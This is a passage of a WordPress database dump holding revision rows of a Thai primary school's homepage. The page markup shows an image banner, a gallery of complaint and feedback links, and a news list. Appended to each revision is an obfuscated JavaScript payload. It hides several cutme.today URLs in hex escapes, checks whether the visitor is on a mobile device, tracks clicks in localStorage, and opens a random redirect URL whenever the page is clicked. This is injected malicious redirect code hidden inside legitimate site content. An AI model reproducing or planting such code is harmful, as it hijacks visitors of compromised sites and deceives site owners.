_0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:46:59','2024-07-27 03:46:59','',14,'http://pakhaeng.ssk.in.th/?p=49',0,'revision','',0),
(50,1,'2024-07-27 10:47:15','2024-07-27 03:47:15','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":200},\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_f0d3cd-f6\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_f0d3cd-f6\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\"} /--></div>\n<!-- /wp:kadence/advancedbtn -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-07-27 10:47:15','2024-07-27 03:47:15','',14,'http://pakhaeng.ssk.in.th/?p=50',0,'revision','',0),
(51,1,'2024-07-27 10:48:56','2024-07-27 03:48:56','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 